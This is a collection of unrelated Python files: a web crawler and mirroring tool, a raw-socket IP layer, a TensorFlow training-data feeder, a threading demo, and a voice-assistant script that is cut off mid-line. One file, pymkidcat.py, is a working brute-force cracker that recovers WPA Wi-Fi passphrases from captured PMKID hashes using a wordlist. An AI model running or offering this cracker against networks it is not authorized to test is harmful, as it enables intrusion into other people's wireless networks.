URL, open it if self._robot.can_fetch('*', cbase): url = self._ulib.urlopen(cbase) # Otherwise, mark as visited and abort else: self._visited[cbase] = 1 return False # If HTTP error, log bad URL and abort except IOError: self._visited[cbase] = 1 self.badurls.append((base[1], cbase)) return False # Get real URL newbase = url.geturl() # Change URL if different from old URL if newbase != cbase: cbase, base = newbase, (newbase, base[1]) # URLs with mimetype 'text/html" scanned for URLs if url.headers.type == 'text/html': # Feed parser contents = url.read() try: badurl, urls = self._webparser(contents) # Log URL if SGML parser can't parse it except self._sperror: self._visited[cbase], self.badhtm[cbase] = 1, 1 return False url.close() # Return URL and extracted urls if it's good if not badurl: return cbase, urls # If the URL is bad (after BadUrl), stop processing and log URL else: self._visited[cbase] = 1 self.badurls.append((base[1], cbase)) return False # Return URL of non-HTML resources and empty list else: url.close() return cbase, [] def _genverify(self, urls, base): '''Verifies a list of full URL relative to a base URL Arguments: urls -- list of raw URLs base -- referring URL''' # Assignments cache, visit, urlverify = self._cache, self._visited, self._urlverify # Strip file off base URL for joining newbase = base.replace(base.split('/')[-1], '') for url in urls: # Get resolved url and raw child URLs url, rawurls = urlverify(url, base, newbase) # Handle any child URLs if rawurls: newurls = {} # Eliminate duplicate URLs for rawurl in rawurls: # Eliminate known visited URLs if rawurl not in visit: newurls[rawurl] = 1 # Put new URLs in cache if present if newurls: cache[url] = newurls # Yield new URL if url: yield url def _multiverify(self, url, base): '''Verifies a full URL relative to a base URL Arguments: url -- a raw URLs base -- referring URL''' # Assignments cache, visited = self._cache, self._visited # Strip file off base URL for joining newbase = base.replace(base.split('/')[-1], '') # Get resolved url and raw child URLs url, rawurls = self._urlverify(url, base, newbase) # Handle any child URLs if rawurls: # Eliminate known visited URLs and duplicates for rawurl in rawurls: # Put new URLs in cache if present if rawurl not in visited: cache[rawurl] = url # Put URL in list of good URLs if url: self._good[url] = 1 def _urlverify(self, url, base, newbase): '''Returns a full URL relative to a base URL Arguments: urls -- list of raw URLs base -- referring URL newbase -- temporary version of referring URL for joining''' # Assignments visited, webopen, other = self._visited, self._webopen, self.other sb, depth, urljoin = self._sb[2], self.depth, self._uparse.urljoin urlsplit, urldefrag = self._uparse.urlsplit, self._uparse.urldefrag outside, redirs, supported = self.outside, self.redirs, self._supported if url not in visited: # Remove whitespace from URL if url.find(' ') != -1: visited[url], url = 1, url.replace(' ', '') if url in visited: return 0, 0 # Remove fragments i.e. 'http:foo/bar#frag' if url.find('#') != -1: visited[url], url = 1, urldefrag(url)[0] if url in visited: return 0, 0 # Process full URLs i.e. 'http://foo/bar if url.find(':') != -1: urlseg = urlsplit(url) # Block non-FTP, HTTP URLs if urlseg[0] not in supported: # Log as non-FTP/HTTP URL other[url], visited[url] = 1, 1 return 0, 0 # If URL is not in root domain, block it if urlseg[1] not in sb: visited[url], outside[url] = 1, 1 return 0, 0 # Block duplicate root URLs elif not urlseg[2] and urlseg[1] == sb: visited[url] = 1 return 0, 0 # Handle relative URLs i.e. ../foo/bar elif url.find(':') == -1: # Join root domain and relative URL visited[url], url = 1, urljoin(newbase, url) if url in visited: return 0, 0 # Test URL by attempting to open it rurl = webopen((url, base)) if rurl and rurl[0] not in visited: # Get URL turl, rawurls = rurl visited[url], visited[turl] = 1, 1 # If URL resolved to a different URL, process it if turl != url: urlseg = urlsplit(turl) # If URL is not in root domain, block it if urlseg[1] not in sb: # Log as a redirected internal URL redirs[(url, turl)] = 1 return 0, 0 # Block duplicate root URLs elif not urlseg[2] and urlseg[1] == sb: return 0, 0 # If URL exceeds depth, don't process if len(turl.split('/')) >= depth: return 0, 0 # Otherwise return URL else: if rawurls: return turl, rawurls else: return turl, [] else: return 0,0 else: return 0, 0 def _onewalk(self): '''Yields good URLs from under a base URL''' # Assignments cache, genverify = self._cache, self._genverify # End processing if cache is empty while cache: # Fetch item from cache base, urls = cache.popitem() # If item has child URLs, process them and yield good URLs if urls: for url in genverify(urls, base): yield url def _multiwalk(self, threads): '''Extracts good URLs from under a base URL Arguments: threads -- number of threads to run''' def urlthread(url, base): '''Spawns a thread containing a multiverify function Arguments: url -- URL to verify base -- referring URL''' # Create instance of Thread dthread = Thread(target=multiverify, args=(url, base)) # Put in pool pool.append(dthread) # Assignments pool, cache, multiverify = [], self._cache, self._multiverify Thread, width, good = self._thread, self.width, self._good # End processing if cache is empty while cache: # Process URLs as long as width not exceeded if len(good) <= width: # Fetch item from cache url, base = cache.popitem() # Make thread if url: urlthread(url, base) # Run threads once pool size is reached if len(pool) == threads or threads >= len(cache): # Start threads for thread in pool: thread.start() # Empty thread pool as threads complete while pool: for thread in pool: if not thread.isAlive(): pool.remove(thread) # End if width reached elif len(good) >= width: break def weburls(self, base=None, width=200, depth=5, thread=None): '''Returns a list of web paths. Arguments: base -- base web URL (default: None) width -- amount of resources to crawl (default: 200) depth -- depth in hierarchy to crawl (default: 5) thread -- number of threads to run (default: None)''' # Assignments self._visited, self._good, self._cache, self.badurls = {}, {}, {}, [] self.redirs, self.outside, self.badhtm, self.other = {}, {}, {}, {} onewalk, good, self._robot = self._onewalk, self._good, self._rparser() uparse, robot, multiwalk = self._uparse, self._robot, self._multiwalk cache = self._cache # Assign width if self.width and width == 200: width = self.width else: self.width = width # sgmlop crashes Python after too many iterations if width > 5000: self._parserpick(1) else: self._parserpick() # Use global base if present if not base: base = self.base # Verify URL and get child URLs newbase, rawurls = self._webopen((base, '')) if newbase: # Change base URL if different if newbase != base: base = newbase # Ensure there's a trailing '/' in base URL if base[-1] != '/': url = list(uparse.urlsplit(base)) url[1] = ''.join([url[1], '/']) base = uparse.urlunsplit(url) # Eliminate duplicates and put raw URLs in cache newurls = {} for rawurl in rawurls: newurls[rawurl] = 1 if newurls: # Cache URLs individually if threads are desired if thread: for newurl in newurls: cache[newurl] = base # Cache in group if no threads else: cache[base] = newurls # Make base URL, get split, and put in verified URL list self.base, self._sb = base, base.split('/') self._visited[base], good[base] = 1, 1 # If URL is bad, abort and raise error else: raise IOError, "URL is invalid" # Adjust dept to length of base URL if self.depth and depth == 6: self.depth += len(self._sb) else: self.depth = depth + len(self._sb) # Get robot limits robot.set_url(''.join([base, 'robots.txt'])) robot.read() # Get signature of bad URL self._webtest() # Get good URLs as long as total width isn't exceeded try: # Multiwalk if threaded if thread: self._multiwalk(thread) # Otherwise, use single thread else: for item in onewalk(): # Don't exceed maximum width if len(good) <= width: good[item] = 1 elif len(good) >= width: break # If user interrupts crawl, return what's done except KeyboardInterrupt: pass # Get URLs, sort them, and return list self.urls = good.keys() self.urls.sort() return self.urls def webpaths(self, b=None, w=200, d=5, t=None): '''Returns a list of web paths. Arguments: b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' def pathize(): '''Strips base URL from full URLs to produce paths''' for url in urls: # Remove base URL from path list url = url.replace(self.base, '') # Add default name 'index.html' to root URLs and directories if not url: url = 'index.html' elif url[-1] == '/': url = ''.join([url, 'index.html']) # Verify removal of base URL and remove it if found if url.find(':') != -1: url = urlsplit(url)[2:][0] yield url # Assignments urlsplit = self._uparse.urlsplit # Run weburls if base passed as an argument if b: self.weburls(b, w, d, t) # Strip off trailing resource or query from base URL if self.base[-1] != '/': self.base = '/'.join(self._sb[:-1]) urls = self.urls # Return path list after stripping base URL self.paths = list(pathize()) return self.paths def webmirror(self, root=None, t=None, base=None, width=200, depth=5): '''Mirrors a website on a local filesystem Arguments: root -- local filesystem path (default: None) t -- number of threads (default: None) base -- base web URL (default: None) width -- amount of resources to crawl (default: 200) depth -- depth in hierarchy to crawl (default: 5)''' if base: self.webspider(base, width, depth, t) return self._mirror((self.paths, self.urls), root, t) def webspider(self, b=None, w=200, d=5, t=None): '''Returns two lists of child URLs and paths Arguments: b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) return self.webpaths(), self.urls def badurlreport(self, f=None, b=None, w=200, d=5, t=None): '''Pretties up a list of bad URLs Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) # Format report if information is available if self.badurls: # Number of bad URLs amount = str(len(self.badurls)) header = '%s broken URLs under %s on %s:\n' # Print referring URL pointing to bad URL body = '\n'.join([' -> '.join([i[0], i[1]]) for i in self.badurls]) report = self._formatreport(amount, header, body, f) # Return if just getting string if report: return report def badhtmreport(self, f=None, b=None, w=200, d=5, t=None): '''Pretties up a list of unparsed HTML URLs Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) # Format report if information is available if self.badhtm: amount = str(len(self.badhtm)) header = '%s unparsable HTML URLs under %s on %s:\n' body = '\n'.join(self.badhtm) report = self._formatreport(amount, header, body, f) # Return if just getting string if report: return report def redireport(self, f=None, b=None, w=200, d=5, t=None): '''Pretties up a list of URLs redirected to an external URL Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) # Format report if information is available if self.redirs: amount = str(len(self.redirs)) header = '%s redirects to external URLs under %s on %s:\n' # Print referring URL pointing to new URL body = '\n'.join([' -> '.join([i[0], i[1]]) for i in self.redirs]) report = self._formatreport(amount, header, body, f) # Return if just getting string if report: return report def outreport(self, f=None, b=None, w=200, d=5, t=None): '''Pretties up a list of outside URLs referenced under the base URL Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) # Format report if information is available if self.outside: amount = str(len(self.outside)) header = '%s links to external URLs under %s on %s:\n' body = '\n'.join(self.outside) report = self._formatreport(amount, header, body, f) # Return if just getting string if report: return report def othereport(self, f=None, b=None, w=200, d=5, t=None): '''Pretties up a list of non-HTTP/FTP URLs Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) # Format report if information is available if self.other: amount = str(len(self.other)) header = '%s non-FTP/non-HTTP URLs under %s on %s:\n' body = '\n'.join(self.other) report = self._formatreport(amount, header, body, f) # Return if just getting string if report: return report def urlreport(self, f=None, b=None, w=200, d=5, t=None): '''Pretties up a list of all URLs under a URL Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None)''' if b: self.weburls(b, w, d, t) # Format report if information is available if self.urls: amount = str(len(self.urls)) header = '%s verified URLs under %s on %s:\n' body = '\n'.join(self.urls) report = self._formatreport(amount, header, body, f) # Return if just getting string if report: return report def webreport(self, f=None, b=None, w=200, d=5, t=None, *vargs): '''Pretties up a list of logged information under a URL Arguments: f -- output file for report (default: None) b -- base web URL (default: None) w -- amount of resources to crawl (default: 200) d -- depth in hierarchy to crawl (default: 5) t -- number of threads (default: None) vargs -- report sections to include or exclude To override defaults: To include a section add 'badhtm', 'redirs', 'outside', or 'other' To exclude a section add 'badurls' or "urls"''' if b: self.weburls(b, w, d, t) # Defaults for report badurls, badhtm, redirs, urls, outside, other = 1, 0, 0, 1, 0, 0 # Create compilation list compile = [] # Override default report settings if argument is passed to vargs for arg in vargs: if arg == 'badurls': badurls = 0 elif arg == 'badhtm': badhtm = 1 elif arg == 'redirs': redirs = 1 elif arg == 'urls': urls = 0 elif arg == 'outside': outside = 1 elif arg == 'other': other = 1 # Compile report if badurls: badurls = self.badurlreport() if badurls: compile.append(badurls) if urls: urls = self.urlreport() if urls: compile.append(urls) if outside: outside = self.outreport() if outside: compile.append(outside) if redirs: redirs = self.redireport() if redirs: compile.append(redirs) if badhtm: badhtm = self.badhtmreport() if badhtm: compile.append(badhtm) if other: other = self.othereport() if other: compile.append(other) # Make report report = '\n\n'.join(compile) # Write to file if argument present if file: open(f, 'w').write(report) # Or return string else: return report def _formatreport(self, amount, header, body, file=None): '''Generic prettifier with date/time stamper Arguments: header -- title of report body -- body of report file -- output file for report (default: None)''' # Get current time localtime, strftime = self._localtime, self._formtime curtime = strftime('%A, %B %d, %Y at %I:%M %p', localtime()) # Make section header header = header % (amount, self.base, curtime) # Add header to body report = '\n'.join([header, body]) # Write to file if argument present if file: open(file, 'w').write(report) # Or return string else: return report def _mirror(self, lists, root=None, threads=None): '''Mirrors a site on a local filesystem based on lists passed to it Argument: lists -- lists of URLs and paths root -- local filesystem path (default: None) threads -- number of threads (default: None)''' def download(url, np, op): '''Downloads files that need to be mirrored.''' # If ftp... if url[:3] == 'ftp': # Open local file local = open(np, 'wb') # Download using FTP session ftp = ftpopen(base, name, password) ftp.retrbinary('RETR %s' % op, local.write) ftp.close() # Close local file local.close() # Use normal urlretrieve if no FTP required else: ulib.urlretrieve(url, np) def dlthread(url, np, op): '''Spawns a thread containing the download function''' # Create thread dthread = Thread(target=download, args=(url, np, op)) # Add to thread pool pool.append(dthread) # Extract path and URL lists paths, urls = lists # Avoid outside namespace lookups ulib, makedirs, sep = self._ulib, self._os.makedirs, self._os.sep normcase, split = self._path.normcase, self._path.split exists, isdir = self._path.exists, self._path.isdir ftpopen = self._ftpopen # Create local names for thread class and thread pool if threads: Thread, pool = self._thread, [] # Localize name and password if exists try: base, name, password = self.base, self._name, self._password except AttributeError: pass # Change to directory if given... if root: if exists(root): if isdir(root): self._os.chdir(root) # Create root if it doesn't exist else: makedirs(root) self._os.chdir(root) # Otherwise use current directory else: root = self._os.getcwd() # Iterate over paths and download files for oldpath in paths: # Sync with the URL for oldpath url = urls[paths.index(oldpath)] # Create name of local copy newpath = normcase(oldpath).lstrip(sep) # Get directory name dirname = split(newpath)[0] # If the directory exists, download the file directly if exists(dirname): if isdir(dirname): if threads: dlthread(url, newpath, oldpath) else: download(url, newpath, oldpath) # Don't create local directory if path in root of remote URL elif not dirname: if threads: dlthread(url, newpath, oldpath) else: download(url, newpath, oldpath) # Make local directory if it doesn't exist, then dowload file else: makedirs(dirname) if threads: dlthread(url, newpath, oldpath) else: download(url, newpath, oldpath) # Run threads if they've hit the max number of threads allowed if threads: # Run if max threads or final thread reached if len(pool) == threads or paths[-1] == oldpath: # Start all threads for thread in pool: thread.start() # Clear the thread pool as they finish while pool: for thread in pool: if not thread.isAlive(): pool.remove(thread) # Instance of Spider enables exporting Spider's methods as standalone functions _inst = Spider() ftpurls = _inst.ftpurls weburls = _inst.weburls ftppaths = _inst.ftppaths webpaths = _inst.webpaths ftpmirror = _inst.ftpmirror ftpspider = _inst.ftpspider webmirror = _inst.webmirror webspider = _inst.webspider webreport = _inst.webreport urlreport = _inst.urlreport outreport = _inst.outreport redireport = _inst.redireport othereport = _inst.othereport badurlreport = _inst.badurlreport badhtmreport = _inst.badhtmreport
IPSocket.py
#! /usr/bin/python3 import threading import socket import queue from IP.IPPacket import IPPacket class IPSocket: LOCAL_HOST_IP="127.0.0.1" def __init__(self, source_address): self.is_connected=False self.send_socket=None self.receive_socket=None self.destionation_ip=None self.source_ip=source_address self.complete_packets_queue=queue.Queue() self.partial_packets_buffer={} self.current_packet_unfinished=None self.listening_thread=None def connect(self, destination): ''' :param destination: destination[0] is destination's link, destination[1] is the socket :return: None ''' self.is_connected=True try: self.receive_socket=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.IPPROTO_TCP) self.receive_socket.setblocking(False) self.send_socket=socket.socket(type=socket.SOCK_RAW,proto=socket.IPPROTO_RAW) self.send_socket.connect(destination) except: raise Exception("sockets cannot be correctly initiated for connection") try: self.destionation_ip=socket.gethostbyname(destination[0]) except: raise Exception("the ip address for the link cannot be found") try: self.thread=threading.Thread(target=self.loop_for_incoming_data) self.thread.setDaemon(True) self.thread.start() except: raise Exception("Listening thread cannot be initiated correctly") def loop_for_incoming_data(self): while 1: if not self.is_connected: break; try: response=self.receive_socket.recvfrom(IPPacket.PACKET_MAX_SIZE) except Exception: continue new_packet=IPPacket.generate_packet_from_received_bytes(response[0]) if new_packet.destination_ip not in [IPSocket.LOCAL_HOST_IP, self.source_ip] or \ new_packet.source_ip!=self.destionation_ip: print("Drop a packet destined for the wrong address") continue if new_packet.checksum()!=0: #ToDo: if the checksum is wrong, does it make sense to continue parsing it? print("Drop a packet whose checksum does not match header") if new_packet.fragment_offset==0 and new_packet.flag_more_fragments==0: self.complete_packets_queue.put(new_packet.data) elif new_packet.flag_more_fragments==1: if new_packet.id not in self.partial_packets_buffer: new_queue=queue.PriorityQueue() new_queue.put((new_packet.fragment_offset, new_packet)) self.partial_packets_buffer[new_packet.id]=new_queue else: self.partial_packets_buffer[new_packet.id].put((new_packet.fragment_offset, new_packet)) self.assemble_if_complete(new_packet.id) def assemble_if_complete(self,id): queue_for_packet= self.partial_packets_buffer[id].copy() last_index=0 data=b'' while not queue_for_packet.empty(): current_partial_packet=queue_for_packet.get() if last_index!=current_partial_packet.fragment_offset: return last_index += (current_partial_packet.total_length-current_partial_packet.ihl*4)/8 data+=current_partial_packet.data del self.partial_packets_buffer[id] self.complete_packets_queue.put(data) def recv(self,max_size=IPPacket.PACKET_MAX_SIZE): packet=None if self.current_packet_unfinished is None: if not self.complete_packets_queue.empty(): packet= self.complete_packets_queue.get(False) return packet else: packet=self.current_packet_unfinished if len(packet)<=max_size: result=packet self.current_packet_unfinished=None else: result=packet[:max_size] self.current_packet_unfinished=packet[max_size:] return result def send(self,data): new_packet=IPPacket(self.source_ip,self.destionation_ip,data) new_packet.set_checksum_field() #print(new_packet.checksum()) self.send_socket.send(new_packet.convert_packet_to_bytes())
feeder.py
import os import threading import time import numpy as np import tensorflow as tf from infolog import log from sklearn.model_selection import train_test_split _batches_per_group = 32 import msgpack import msgpack_numpy msgpack_numpy.patch() class Feeder: """ Feeds batches of data into queue on a background thread. """ def __init__(self, coordinator, metadata_filename, hparams): super(Feeder, self).__init__() self._coord = coordinator self._hparams = hparams self._train_offset = 0 self._test_offset = 0 # Load metadata self._out_dir = os.path.dirname(metadata_filename) with open(metadata_filename, encoding='utf-8') as f: self._metadata = [] for line in f: npz_filename, time_steps, mel_frames, text = line.strip().split('|') self._metadata.append( [os.path.join(self._out_dir, os.path.basename(npz_filename)), time_steps, mel_frames, text]) frame_shift_ms = hparams.hop_size / hparams.sample_rate hours = sum([int(x[2]) for x in self._metadata]) * frame_shift_ms / 3600 log('Loaded metadata for {} examples ({:.2f} hours)'.format(len(self._metadata), hours)) # Train test split if hparams.test_size is None: assert hparams.test_batches is not None test_size = (hparams.test_size if hparams.test_size is not None else hparams.test_batches * hparams.batch_size) indices = np.arange(len(self._metadata)) train_indices, test_indices = train_test_split(indices, test_size=test_size, random_state=hparams.data_random_state) # Make sure test_indices is a multiple of batch_size else round down len_test_indices = self._round_down(len(test_indices), hparams.batch_size) extra_test = test_indices[len_test_indices:] test_indices = test_indices[:len_test_indices] train_indices = np.concatenate([train_indices, extra_test]) self._train_meta = list(np.array(self._metadata)[train_indices]) self._test_meta = list(np.array(self._metadata)[test_indices]) self.test_steps = len(self._test_meta) // hparams.batch_size if hparams.test_size is None: assert hparams.test_batches == self.test_steps # pad input sequences with the <pad_token> 0 ( _ ) self._pad = 0 # explicitely setting the padding to a value that doesn't originally exist in the spectogram # to avoid any possible conflicts, without affecting the output range of the model too much if hparams.symmetric_mels: self._target_pad = -hparams.max_abs_value else: self._target_pad = 0. # Mark finished sequences with 1s self._token_pad = 1. with tf.device('/cpu:0'): # Create placeholders for inputs and targets. Don't specify batch size because we want # to be able to feed different batch sizes at eval time. self._placeholders = [ tf.placeholder(tf.int32, shape=(None, None), name='inputs'), tf.placeholder(tf.int32, shape=(None,), name='input_lengths'), tf.placeholder(tf.float32, shape=(None, None, hparams.num_mels), name='mel_targets'), tf.placeholder(tf.float32, shape=(None, None), name='token_targets'), tf.placeholder(tf.float32, shape=(None, None, hparams.num_freq), name='linear_targets'), tf.placeholder(tf.int32, shape=(None,), name='targets_lengths'), ] # Create queue for buffering data queue = tf.FIFOQueue(8, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32], name='input_queue') self._enqueue_op = queue.enqueue(self._placeholders) self.inputs, self.input_lengths, self.mel_targets, self.token_targets, self.linear_targets, self.targets_lengths = queue.dequeue() self.inputs.set_shape(self._placeholders[0].shape) self.input_lengths.set_shape(self._placeholders[1].shape) self.mel_targets.set_shape(self._placeholders[2].shape) self.token_targets.set_shape(self._placeholders[3].shape) self.linear_targets.set_shape(self._placeholders[4].shape) self.targets_lengths.set_shape(self._placeholders[5].shape) # Create eval queue for buffering eval data eval_queue = tf.FIFOQueue(1, [tf.int32, tf.int32, tf.float32, tf.float32, tf.float32, tf.int32], name='eval_queue') self._eval_enqueue_op = eval_queue.enqueue(self._placeholders) self.eval_inputs, self.eval_input_lengths, self.eval_mel_targets, self.eval_token_targets, \ self.eval_linear_targets, self.eval_targets_lengths = eval_queue.dequeue() self.eval_inputs.set_shape(self._placeholders[0].shape) self.eval_input_lengths.set_shape(self._placeholders[1].shape) self.eval_mel_targets.set_shape(self._placeholders[2].shape) self.eval_token_targets.set_shape(self._placeholders[3].shape) self.eval_linear_targets.set_shape(self._placeholders[4].shape) self.eval_targets_lengths.set_shape(self._placeholders[5].shape) def start_threads(self, session): self._session = session thread = threading.Thread(name='background', target=self._enqueue_next_train_group) thread.daemon = True # Thread will close when parent quits thread.start() thread = threading.Thread(name='background', target=self._enqueue_next_test_group) thread.daemon = True # Thread will close when parent quits thread.start() @staticmethod def loads_msgpack(path): """ Args: :param path: the output of `dumps`. """ with open(path, 'rb') as f: bin_data = f.read() return msgpack.loads(bin_data, raw=False) def _get_test_groups(self): npz_filename, time_steps, mel_frames, text = self._test_meta[self._test_offset] self._test_offset += 1 npz_data = self.loads_msgpack(npz_filename) input_data = npz_data['input_data'] mel_target = npz_data['mel'] linear_target = npz_data['linear'] target_length = npz_data['mel_frames'] token_target = npz_data['stop_token'] return input_data, mel_target, token_target, linear_target, target_length def make_test_batches(self): start = time.time() # Read a group of examples n = self._hparams.batch_size r = self._hparams.outputs_per_step # Test on entire test set examples = [self._get_test_groups() for _ in range(len(self._test_meta))] # Bucket examples based on similar output sequence length for efficiency examples.sort(key=lambda x: x[-1]) batches = [examples[i: i + n] for i in range(0, len(examples), n)] np.random.shuffle(batches) log('\nGenerated {} test batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start)) return batches, r def _enqueue_next_train_group(self): while not self._coord.should_stop(): start = time.time() # Read a group of examples n = self._hparams.batch_size r = self._hparams.outputs_per_step examples = [self._get_next_example() for _ in range(n * _batches_per_group)] # Bucket examples based on similar output sequence length for efficiency examples.sort(key=lambda x: x[-1]) batches = [examples[i: i + n] for i in range(0, len(examples), n)] np.random.shuffle(batches) log('\nGenerated {} train batches of size {} in {:.3f} sec'.format(len(batches), n, time.time() - start)) for batch in batches: feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r))) self._session.run(self._enqueue_op, feed_dict=feed_dict) def _enqueue_next_test_group(self): # Create test batches once and evaluate on them for all test steps test_batches, r = self.make_test_batches() while not self._coord.should_stop(): for batch in test_batches: feed_dict = dict(zip(self._placeholders, self._prepare_batch(batch, r))) self._session.run(self._eval_enqueue_op, feed_dict=feed_dict) def _get_next_example(self): """Gets a single example (input, mel_target, token_target, linear_target, mel_length) from_ disk """ if self._train_offset >= len(self._train_meta): self._train_offset = 0 np.random.shuffle(self._train_meta) npz_filename, time_steps, mel_frames, text = self._train_meta[self._train_offset] self._train_offset += 1 npz_data = self.loads_msgpack(npz_filename) input_data = npz_data['input_data'] mel_target = npz_data['mel'] linear_target = npz_data['linear'] target_length = npz_data['mel_frames'] token_target = npz_data['stop_token'] return input_data, mel_target, token_target, linear_target, target_length def _prepare_batch(self, batches, outputs_per_step): np.random.shuffle(batches) targets_lengths = np.asarray([x[-1] for x in batches], dtype=np.int32) # Used to mask loss input_lengths = np.asarray([len(x[0]) for x in batches], dtype=np.int32) inputs, input_max_len = self._prepare_inputs([x[0] for x in batches]) mel_targets, mel_target_max_len = self._prepare_targets([x[1] for x in batches], outputs_per_step) token_targets, token_target_max_len = self._prepare_token_targets([x[2] for x in batches], outputs_per_step) linear_targets, linear_target_max_len = self._prepare_targets([x[3] for x in batches], outputs_per_step) return inputs, input_lengths, mel_targets, token_targets, linear_targets, targets_lengths def _prepare_inputs(self, inputs): max_len = max([len(x) for x in inputs]) return np.stack([self._pad_input(x, max_len) for x in inputs]), max_len def _prepare_targets(self, targets, alignment): max_len = max([len(t) for t in targets]) data_len = self._round_up(max_len, alignment) return np.stack([self._pad_target(t, data_len) for t in targets]), data_len def _prepare_token_targets(self, targets, alignment): max_len = max([len(t) for t in targets]) data_len = self._round_up(max_len, alignment) return np.stack([self._pad_token_target(t, data_len) for t in targets]), data_len def _pad_input(self, x, length): return np.pad(x, (0, length - x.shape[0]), mode='constant', constant_values=self._pad) def _pad_target(self, t, length): return np.pad(t, [(0, length - t.shape[0]), (0, 0)], mode='constant', constant_values=self._target_pad) def _pad_token_target(self, t, length): return np.pad(t, (0, length - t.shape[0]), mode='constant', constant_values=self._token_pad) @staticmethod def _round_up(x, multiple): remainder = x % multiple return x if remainder == 0 else x + multiple - remainder @staticmethod def _round_down(x, multiple): remainder = x % multiple return x if remainder == 0 else x - remainder
example3.py
import threading def writer(): global text while True: with service: resource.acquire() print(f"Writing being done by {threading.current_thread().name}.") text += f"Writing was done by {threading.current_thread().name}. " resource.release() def reader(): global rcount while True: with service: rcounter.acquire() rcount += 1 if rcount == 1: resource.acquire() rcounter.release() print(f"Reading being done by {threading.current_thread().name}:") # print(text) with rcounter: rcount -= 1 if rcount == 0: resource.release() text = "This is some text. " rcount = 0 rcounter = threading.Lock() resource = threading.Lock() service = threading.Lock() threads = [threading.Thread(target=reader) for i in range(3)] + [ threading.Thread(target=writer) for i in range(2) ] for thread in threads: thread.start()
pymkidcat.py
#!/usr/bin/env python import sys from hashlib import pbkdf2_hmac, sha1 import argparse import datetime import multiprocessing import os start = datetime.datetime.now() def to_brute(sem): sem.acquire() with open(wordlist) as w: for line in w: line = line.strip() if (len(line) <= 7): continue # pbkdf2_gen pmk = (pbkdf2_hmac(hash_name='sha1', password=line, salt=essid, iterations=4096, dklen=32)) # hmac-sha1_gen end compare trans_5C = "".join(chr(x ^ 0x5c) for x in xrange(256)) trans_36 = "".join(chr(x ^ 0x36) for x in xrange(256)) blocksize = sha1().block_size pmk += chr(0) * (blocksize - len(pmk)) o_key_pad = pmk.translate(trans_5C) i_key_pad = pmk.translate(trans_36) # compare hmac-sha1 with PMKID, if match show result end kill child process. if (sha1(o_key_pad + sha1(i_key_pad + msg).digest()).hexdigest()[:32]) == pmkid: end = datetime.datetime.now() elapsed = end - start print("[!] AP: %s Cracked!!!\n\t\tPSK...: %s \n\t\tTime elapsed...: %s \n" % (essid, line, str(elapsed)[:-3])) sem.release() sys.exit() print( "[!] Ap " + essid + " exhausted") sem.release() parser = argparse.ArgumentParser() parser.add_argument('-z', action='store', dest='hash_file', help='hcxpcaptool -z file') parser.add_argument('-w', action='store', dest='wordlist_file', help='wordlist file') results = parser.parse_args() hash_file = results.hash_file wordlist = results.wordlist_file if hash_file is None or wordlist is None: parser.print_help() sys.exit() if __name__ == '__main__': print("running...\n") try: wf = open(wordlist, 'r') except IOError: print("[!] I cannot load this file: " + wordlist) sys.exit() if hash_file is not None: try: to_crack = [line.strip() for line in open(hash_file)] except IOError: print("[!] I cannot load this file: " + hash_file) sys.exit() to_crack = filter(None, to_crack) # Creates processes for each hash maxconnections = multiprocessing.cpu_count() # number of spawning to_bute() function, based on your processor cores sem = multiprocessing.BoundedSemaphore(value=maxconnections) for hashes in to_crack: hcl = hashes.strip().split('*') pmkid = (hcl[0]) macAp = (hcl[1]) macCli = (hcl[2]) essid = (hcl[3]).decode('hex') msg = ("504d4b204e616d65" + macAp + macCli).decode("hex") # Atom's magic numbers :) mp = multiprocessing.Process(target=to_brute, args=(sem,)) mp.start()
main.py
# 🚩 Dada Ki Jay Ho 🚩 # Global Things ---------------------------------------- import speech_recognition as sr import webbrowser as wb import threading import pyautogui import datetime import socket import os from Resources.Work_By_Raj.Opening_Applications import Opening_Applications from Resources.Work_By_Raj.AutoSave import auto_save from Resources.Work_By_Raj.Google_Calender_api.Resources import Return_events_info from Resources.UsedForBoth import text_to_speech from Resources.Work_By_Shaishav.Send_Email import Send_Achinya_started_email from Resources.Work_By_Shaishav.Fetch_text_from_image import fetch_text_image from Resources.Work_By_Shaishav import OpenFolder recognizer = sr.Recognizer() microphone = sr.Microphone() recognizer.energy_threshold = 668 recognizer.pause_threshold = .6 recognizer.operation_timeout = 11 # ------------------------------------------------------- def welcome(): text_to_speech.sayAndWait("Welcome Sir!") text_to_speech.sayAndWait("I am Your Virtual Assistant") # Return_events_info.say_event_details("how many events do I have today") def run_cmd(cmd: str): cmd = cmd.lower() if "search" in cmd: thing_to_search = cmd[len("search "):] wb.open("https://www.google.com/search?q=" + thing_to_search) if "open " in cmd and "drive" not in cmd and "folder" not in cmd: try: Opening_Applications.open_applications(cmd) except Exception as e: text_to_speech.sayAndWait(e) if "open" in cmd and ("drive" in cmd or "folder" in cmd): OpenFolder.open_folder(cmd) if ("start" in cmd or "turn on" in cmd) and ("auto save" in cmd or "autosave" in cmd or "automatic save" in cmd): auto_save.is_auto_save_on = True thread = threading.Thread(target=auto_save.show_auto_save_window) thread.start() # auto_save.auto_save(cmd) if "upcoming" in cmd and 